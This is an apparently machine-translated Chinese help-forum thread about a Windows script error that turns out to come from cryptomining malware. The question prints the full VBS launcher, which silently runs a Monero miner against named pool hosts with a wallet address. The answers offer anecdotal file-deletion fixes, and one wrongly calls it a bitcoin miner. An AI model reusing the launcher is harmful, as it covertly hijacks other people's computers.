如何解决错误 windows/xdgaudio.vbs [关闭]

Question

Windows 脚本宿主错误。

C:\Windows\xdgaudio.vbs的内容如下。

Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0
Set WShell = Nothing

我附上错误的图片，请查看并给我解决方案。

Answer 1

想通了！！简短回答：从 Windows 目录中删除“servicecrsssr.vbs”文件，然后重新启动。 （尽管存在文件丢失/损坏的危险，我实际上拔掉了插头，以避免程序在关机过程中尝试重写任何有问题的文件的可能性。）

涉及许多其他文件，但在删除（或重命名）上述文件并重新启动后一切正常...没有证据表明采矿过程正在运行。我在两台测试计算机上感染了这种病毒。这些是我通过 USB 将客户的受感染驱动器连接到的唯一计算机。这东西到底是如何传播的仍然是个谜！其他似乎涉及的文件是：

\Windows\winprs.bat
\Windows\winvpr.vbs
\Windows\winvprse.bat
\Windows\xdgaudio.vbs
\Windows\Prefetch\WMIPVRSE.exe-xxxxxxxx.pf

如果您重命名或删除它并重新启动，*.pf 文件会用新的随机字符代替“x”重写自身 - 我可以确定没有任何不良影响。在我的第一台受感染的机器上，我重命名了上面的所有文件，重命名每个文件后重新启动。我尝试的最后一个文件是“servicecrsssr.vbs”。在第二台受感染的测试机器上，我只重命名了“servicecrsssr.vbs”文件并重新启动，然后一切正常。请让我知道这对你有什么影响。谢谢！

Answer 2

它确实是一个比特币矿工，谢天谢地，它是一个相当糟糕的矿工，非常明显，而且比运行后台进程更不恶意。我运行的任何防病毒/恶意软件应用程序都没有捡起它。我的发现是在儿童下载的安装文件中的游戏中。

反病毒程序应该很容易发现这一点，vbs 和批处理文件是如此明显。 Malwarebytes 最终抱怨他们调用的实际矿工 .exe 文件，但只是在它运行之后。